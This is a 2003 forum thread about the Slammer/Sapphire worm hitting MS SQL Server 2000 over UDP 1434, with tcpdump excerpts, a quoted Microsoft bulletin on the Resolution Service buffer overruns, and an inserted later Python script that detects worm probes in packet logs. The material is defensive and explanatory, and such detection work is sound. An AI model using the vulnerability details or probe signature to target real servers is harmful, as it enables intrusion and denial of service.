SQL2000, if you haven't already



prana
01-26-2003, 05:09 PM
heard...

Block open ports 1433, 1434 off the internet for both UDP and TCP. The worm which crippled the internet 3 days ago, spreads by causing a DoS attack on SQL 2000 and border Cisco routers, causing lock ups.

A patch has been out for a long time, so it's time to patch and DENY and DROP those packets.


I've completed an analysis of the 'Sapphire' SQL worm targeting MS-SQL
servers. Some have reported massive slowdowns. An interesting part of this
worm results from its use of UDP. Attacked hosts/networks may generate ICMP
Host/Port Unreachable messages in response to a Sapphire attack, amplifying
the attack's strength. One reason that this attack is worse for users of
home systems, etc. that don't run any servers, is because Sapphire sends the
entire 400 bytes or so in the initial packet, where scans from Code Red and
brethren only prompted a 26-byte TCP SYN packet.

The full analysis is available at:
http://www.techie.hopto.org/sqlworm.html



Hi,

This seems to have started for us about 4:30pm (GMT+11) today.

Lucky for us we block all MS-SQL 1434/udp traffic. We have logged over
130,000 firewall blocked connections across 15 odd sites, and it's coming in
from all over the world.

I don't have any infected servers to study the habits of this worm, but the
payload seems to always look pretty much like this.

8<---snip
20:56:02.115087 X.X.X.X.4178 > X.X.X.X.1434: [udp sum ok] udp 376 (ttl 109, id 46811)
8<---snip


I would also recommend that all your IDS sensors get a new signature to record
all outbound 1434/udp in case it sneaks into your networks via private links,
etc.

Regards,

Ed.




> I'm getting massive packet loss to various points on the globe.
> I am seeing a lot of these in my tcpdump output on each
> host.
>
> 02:06:31.017088 150.140.142.17.3047 > 24.193.37.212.ms-sql-m: udp 376
> 02:06:31.017244 24.193.37.212 > 150.140.142.17: icmp: 24.193.37.212 udp
> port ms-sql-m unreachable [tos 0xc0
>
> It looks like there's a worm affecting MS SQL Server which is
> pingflooding addresses at some random sequence.
>
> All admins with access to routers should block port 1434 (ms-sql-m)!
>
> Everyone running MS SQL Server shut it the hell down or make
> sure it can't access the internet proper!
>
> I make no guarantees that this information is correct, test it
> out for yourself!




Some News: http://news.zdnet.co.uk/story/0,,t269-s2099780,00.html
Advisory: http://www.nextgenss.com/advisories/mssql-udp.txt
Microsoft Fix: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp

MS SQL listens on port 1434/udp so that clients can figure out which method
of communication to use (named pipes, tcp/ip et al). There are two problems
that yield the ability to execute code remotely while unauthenticated.
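As an added example (not from the thread or any of the quoted advisories), this Python script applies the observations above to tcpdump-style lines: it counts the 376-byte datagrams to 1434/udp (printed by tcpdump as "ms-sql-m") per source, counts the ICMP port-unreachable replies that make up the amplification traffic, and flags outbound 1434/udp from a local prefix, which is what Ed's outbound IDS signature is meant to catch. The capture lines, the documentation addresses and the 192.0.2.0/24 local range are constructed.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Slammer/Sapphire probes as described in the thread: one UDP datagram to 1434/udp
# (tcpdump prints that port as "ms-sql-m") carrying a 376-byte payload.
SQL_MONITOR_PORTS = {"1434", "ms-sql-m"}
SAPPHIRE_UDP_LEN = 376

UDP_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\S+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>[^:]+): (?:\[udp sum ok\] )?udp (?P<len>\d+)"
)
ICMP_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+(?:\.\d+){3}) > (?P<dst>\d+(?:\.\d+){3}): icmp: "
    r"\S+ udp port (?P<port>\S+) unreachable"
)

def analyse(lines, local_net):
    """Count inbound 376-byte 1434/udp probes per source, ICMP port-unreachable
    reflections, and outbound probes from local_net (a sign of an infected host)."""
    local = ip_network(local_net)
    probes, outbound, reflected = Counter(), Counter(), 0
    for line in lines:
        m = UDP_RE.match(line)
        if m and m["dport"] in SQL_MONITOR_PORTS and int(m["len"]) == SAPPHIRE_UDP_LEN:
            if ip_address(m["src"]) in local:
                outbound[m["src"]] += 1   # what an outbound 1434/udp IDS signature would catch
            else:
                probes[m["src"]] += 1
            continue
        m = ICMP_RE.match(line)
        if m and m["port"] in SQL_MONITOR_PORTS:
            reflected += 1                # the amplification traffic described above
    return {"probes": probes, "outbound": outbound, "reflected": reflected}

# Constructed sample capture (documentation addresses) in the format of the
# tcpdump lines quoted in the thread; 192.0.2.0/24 plays the local network.
SAMPLE = """\
02:06:31.017088 203.0.113.17.3047 > 192.0.2.212.ms-sql-m: udp 376
02:06:31.017244 192.0.2.212 > 203.0.113.17: icmp: 192.0.2.212 udp port ms-sql-m unreachable [tos 0xc0]
02:06:31.201300 203.0.113.17.3047 > 192.0.2.9.1434: [udp sum ok] udp 376 (ttl 109, id 46811)
02:06:31.201411 192.0.2.9 > 203.0.113.17: icmp: 192.0.2.9 udp port 1434 unreachable
02:06:32.000001 198.51.100.5.1434 > 192.0.2.212.1434: udp 376
02:06:32.500000 192.0.2.50.1434 > 198.51.100.77.ms-sql-m: udp 376
02:06:33.000000 203.0.113.17.3048 > 192.0.2.212.ms-sql-m: udp 40
""".splitlines()

if __name__ == "__main__":
    print(analyse(SAMPLE, "192.0.2.0/24"))
```

Feed it `tcpdump -n` output (or a firewall log rewritten into that shape) and a non-empty `outbound` counter is the case worth paging someone about: a host inside your own prefix is doing the probing.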

Laughing Cow
01-26-2003, 05:17 PM
Hi Prana.

Any ideas if the loophole only exists for MS SQL 2000 or are older Versions like 7.0 also affected.

At my Company we do run MS SQL 7.0, but luckily only for testing and playing around with.

Actual DBases are Sybase, Oracle & UDB.
:D

Thanks, for any info.

dezhen2001
01-26-2003, 05:24 PM
dunno what any of that means but it doesn't sound good :(
thanks for the info buddy

dawood

prana
01-26-2003, 05:34 PM
Originally posted by Laughing Cow
Hi Prana.

Any ideas if the loophole only exists for MS SQL 2000 or are older Versions like 7.0 also affected.

At my Company we do run MS SQL 7.0, but luckily only for testing and playing around with.

Actual DBases are Sybase, Oracle & UDB.
:D

Thanks, for any info.


Buffer Overruns in SQL Server 2000 Resolution Service Could Enable Code Execution (Q323875)
Originally posted: July 24, 2002

Summary
Who should read this bulletin: System administrators using Microsoft® SQL Server™ 2000 and Microsoft Desktop Engine 2000.

Impact of vulnerability: Three vulnerabilities, the most serious of which could enable an attacker to gain control over an affected server.

Maximum Severity Rating: Critical

Recommendation: System administrators should install the patch immediately.

Affected Software:

Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Technical details
Technical description:


SQL Server 2000 and MSDE 2000 introduce the ability to host multiple instances of SQL Server on a single physical machine. Each instance operates for all intents and purposes as though it was a separate server. However, the multiple instances cannot all use the standard SQL Server session port (TCP 1433). While the default instance listens on TCP port 1433, named instances listen on any port assigned to them. The SQL Server Resolution Service, which operates on UDP port 1434, provides a way for clients to query for the appropriate network endpoints to use for a particular SQL Server instance.

There are three security vulnerabilities here. The first two are buffer overruns. By sending a carefully crafted packet to the Resolution Service, an attacker could cause portions of system memory (the heap in one case, the stack in the other) to be overwritten. Overwriting it with random data would likely result in the failure of the SQL Server service; overwriting it with carefully selected data could allow the attacker to run code in the security context of the SQL Server service.

SQL Server 2000 runs in a security context chosen by the administrator at installation time. By default, it runs as a Domain User. Thus, although the attacker’s code could take any desired action on the database, it would not necessarily have significant privileges at the operating system level if best practices have been followed.
The risk posed by the vulnerability could be mitigated by, if feasible, blocking port 1434 at the firewall.

Denial of Service via SQL Server Resolution Service:

An attack could be broken off by restarting the SQL Server 2000 service on either of the affected systems. Normal processing on both systems would resume once the attack ceased.

The vulnerability provides no way to gain any privileges on the system. It is a denial of service vulnerability only.
Severity Rating (SQL Server 2000):

                                                      Internet Servers   Intranet Servers   Client Systems
Buffer Overruns in SQL Server Resolution Service      Critical           Critical           None
Denial of Service via SQL Server Resolution Service   Critical           Critical           None
The above assessment is based on the types of systems affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.

Vulnerability identifier:

Buffer Overruns in SQL Server Resolution Service: CVE-CAN-2002-0649
Denial of Service via SQL Server Resolution Service: CVE-CAN-2002-0650
Tested Versions:
Microsoft tested SQL Server 2000 and 7.0 (and their associated versions of MSDE) to assess whether they are affected by these vulnerabilities. Previous versions are no longer supported, and may or may not be affected by these vulnerabilities.




Is the UDP 1434 port typically blocked at the firewall?

It depends on the particular deployment scenario.

If a network doesn’t host any Internet-connected SQL Servers, the port associated with the SQL Server Resolution Service (and all other ports associated with SQL Server) should be blocked.
If a network offers SQL Server services to the Internet but there’s only a single instance on the server, the SQL Resolution Service can and should be blocked.
If a network offers SQL Server services to the Internet and has more than one instance, the SQL Resolution Service must be accessible through the firewall.
Does the SQL Server Resolution Service exist on previous versions of SQL Server?

No. Previous versions of SQL Server didn’t support multiple instances, and the SQL Server Resolution Service didn’t exist. As a result, no other versions of SQL Server are affected by the vulnerabilities.

The Affected Versions section says that Microsoft Desktop Engine (MSDE) is also affected by these vulnerabilities. What is MSDE?

MSDE is a database engine that’s built and based on SQL Server 2000 technology, and which ships as part of several Microsoft products, including Microsoft Visual Studio and Microsoft Office Developer Edition. There is a direct connection between versions of MSDE and versions of SQL Server. MSDE 2000 is based on SQL Server 2000.


How does the patch eliminate the vulnerability?


Patch availability
Download locations for this patch
Microsoft SQL Server 2000 and MSDE 2000:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602

Additional information about this patch
Installation platforms:
This patch can be installed on systems running SQL Server 2000 Service Pack 2.
Inclusion in future service packs:
The fix for this issue will be included in SQL Server 2000 Service Pack 3.

Reboot needed: No. The SQL Server service only needs to be restarted after applying the patch.

Patch can be uninstalled: Yes.

Superseded patches: None.

Verifying patch installation:

To ensure you have the fix installed properly, verify the individual files by consulting the date/time stamp of the files listed in the file manifest in Microsoft Knowledge Base article Q316333.
Caveats:
None


Security patches are available from the Microsoft Download Center, and can be most easily found by doing a keyword search for "security_patch".
Patches for consumer platforms are available from the WindowsUpdate web site.
Other information:
Acknowledgments
Microsoft thanks David Litchfield of Next Generation Security Software Ltd. for reporting these issues to us and working with us to protect customers.

Support:

Microsoft Knowledge Base article Q323875 discusses this issue and will be available approximately 24 hours after the release of this bulletin. Knowledge Base articles can be found on the Microsoft Online Support web site.
Technical support is available from Microsoft Product Support Services. There is no charge for support calls associated with security patches.
Security Resources: The Microsoft TechNet Security Web Site provides additional information about security in Microsoft products.



Dezhen :) No worries, just wanna inform you guys

Laughing Cow
01-26-2003, 05:40 PM
Prana.

Thanks, for the info.

It cleared things up for me.

rogue
01-26-2003, 06:36 PM
Microsoft Sux, Time for Whopner.